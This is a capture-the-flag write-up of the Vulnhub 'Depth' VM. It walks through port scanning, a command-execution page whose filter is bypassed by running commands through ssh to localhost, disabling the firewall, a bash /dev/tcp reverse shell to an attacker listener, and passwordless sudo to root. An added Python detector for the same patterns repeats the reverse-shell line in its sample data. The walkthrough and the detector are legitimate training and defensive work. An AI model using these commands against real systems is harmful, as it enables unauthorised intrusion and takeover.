This is my write-up of Depth, a boot2root VM on Vulnhub.
As usual, I start with a port scan of the box.
# Nmap 7.50 scan initiated Fri Dec 22 16:07:55 2017 as: nmap -A -T4 -sV -p- -Pn -n -v -oA full 192.168.1.76
adjust_timeouts2: packet supposedly had rtt of -1293499 microseconds. Ignoring time.
Nmap scan report for 192.168.1.76
Host is up (0.00087s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:3E:AD:42 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.11 - 4.1
Uptime guess: 38.020 days (since Tue Nov 14 15:48:53 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.87 ms 192.168.1.76
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 22 16:17:55 2017 -- 1 IP address (1 host up) scanned in 600.27 seconds
As the scan shows, only one port is open, 8080. Navigating to it presents what looks like a default Tomcat installation with some files removed.
Next, I run a directory brute-force against the server to see whether any interesting files are lying around.
root@kali:~/Tools/dirsearch# ./dirsearch.py -u http://192.168.1.76:8080/ -w ../SecLists/Discovery/Web_Content/raft-small-files.txt -t 20 -b -e "jsp"
Extensions: jsp | Threads: 20 | Wordlist size: 11424
Error Log: /root/Tools/dirsearch/logs/errors-17-12-22_16-22-30.log
Target: http://192.168.1.76:8080/
[16:22:30] Starting:
[16:22:30] 200 - 2KB - /index.html
[16:22:32] 200 - 2KB - /
[16:23:08] 200 - 573B - /test.jsp
Task Completed
A page called test.jsp was found. Let's see what it is about in a browser.
The page appears to run whatever command I type into the textbox (not every command works; echoing into a file, for example, seems to be blocked) and then prints the output, with some formatting applied to the text.
With an ls -l of /home/ I get the username of the local user.
With that in hand, and after many failed attempts to run anything actually useful, I notice that commands piped through SSH do run. For example, sudo -l by itself doesn't seem to work, but ssh bill@localhost sudo -l runs just fine.
Even though the formatting is odd, the returned text looks very much like "User root may run the following commands on kali", so it seems the user does have some privileged access on the system.
Taking a leap of faith, and since outbound traffic is probably being blocked, I go ahead and disable the firewall.
There is no output, so we are going blind here. Pushing that leap of faith a bit further, I launch a reverse shell the same way with ssh bill@localhost bash -i >& /dev/tcp/192.168.1.86/4444 0>&1, and since the page doesn't finish loading I have a good feeling about this.
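From the defender's side, the two behaviours just described are the things to alert on: the web application's service account spawning ssh to the local host (which is how the page's command filter was sidestepped), and a shell started with a /dev/tcp redirection. The following is an added example, not code from the original write-up or the VM; it assumes a simplified, constructed exec-audit record format (user=, parent=, cmd=) and assumes the Tomcat service runs as the account "tomcat".

```python
"""Flag exec records that match the patterns seen in the Depth write-up:
a web service account running ssh to localhost, or a shell with a
/dev/tcp redirection. Record format and sample data are constructed."""
import re
from dataclasses import dataclass

# Constructed sample records; not real logs from the VM (assumption: the
# web application runs as "tomcat" and its parent process is "java").
SAMPLE_RECORDS = """\
user=tomcat parent=java cmd=ls -l /home/
user=tomcat parent=java cmd=ssh bill@localhost sudo -l
user=tomcat parent=java cmd=ssh bill@localhost bash -i >& /dev/tcp/192.168.1.86/4444 0>&1
user=bill parent=sshd cmd=bash -i >& /dev/tcp/192.168.1.86/4444 0>&1
user=bill parent=bash cmd=sudo su
user=alice parent=bash cmd=ssh alice@fileserver.example ls
"""

WEB_SERVICE_ACCOUNTS = {"tomcat", "www-data"}   # assumed service accounts
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
RECORD_RE = re.compile(r"user=(\S+) parent=(\S+) cmd=(.*)")
# "ssh [user@]host ..." -> capture the host part only
SSH_RE = re.compile(r"\bssh\s+(?:\S+@)?(\S+)")


@dataclass
class Finding:
    line_no: int
    reason: str
    cmd: str


def analyse(text: str) -> list[Finding]:
    """Return one Finding per matched rule; a record can match more than one."""
    findings: list[Finding] = []
    for n, line in enumerate(text.splitlines(), 1):
        m = RECORD_RE.match(line)
        if not m:
            continue  # not an exec record in the assumed format
        user, _parent, cmd = m.groups()
        ssh = SSH_RE.search(cmd)
        # Rule 1: the web app's account should never ssh back into its own host.
        if user in WEB_SERVICE_ACCOUNTS and ssh and ssh.group(1) in LOCAL_HOSTS:
            findings.append(Finding(n, "web service account ssh to localhost", cmd))
        # Rule 2: /dev/tcp redirections in a command line are a reverse-shell marker.
        if "/dev/tcp/" in cmd:
            findings.append(Finding(n, "shell with /dev/tcp redirection", cmd))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_RECORDS):
        print(f"line {f.line_no}: {f.reason}: {f.cmd}")
```

On the sample data this reports lines 2 and 3 for the localhost ssh rule and lines 3 and 4 for the /dev/tcp rule, while the legitimate ssh to a remote file server on line 6 is left alone.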
Meanwhile, on my local netcat listener:
root@kali:~/Documents/ctfs/vulnhub/depth# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.1.86] from b2r.lan [192.168.1.76] 40468
bash: cannot set terminal process group (2906): Inappropriate ioctl for device
bash: no job control in this shell
bill@b2r:~$ whoami
whoami
bill
bill@b2r:~$ id
id
uid=1000(bill) gid=1000(bill) groups=1000(bill),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lxd),116(lpadmin),117(sambashare)
bill@b2r:~$
And there it is; it all worked just fine. Now let's check what kind of access the user has.
bill@b2r:~$ sudo -l
sudo -l
Matching Defaults entries for bill on b2r:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bill may run the following commands on b2r:
(ALL : ALL) NOPASSWD: ALL
So bill can run anything as root without a password. Time to head straight for the flag.
bill@b2r:~$ sudo su
sudo su
cd /root/
ls
flag
cat flag
flag{WellThatWasEasy}
Aaand there it is, the root flag. Thanks a lot to Vulnhub, and to Dan Lawson for building this VM.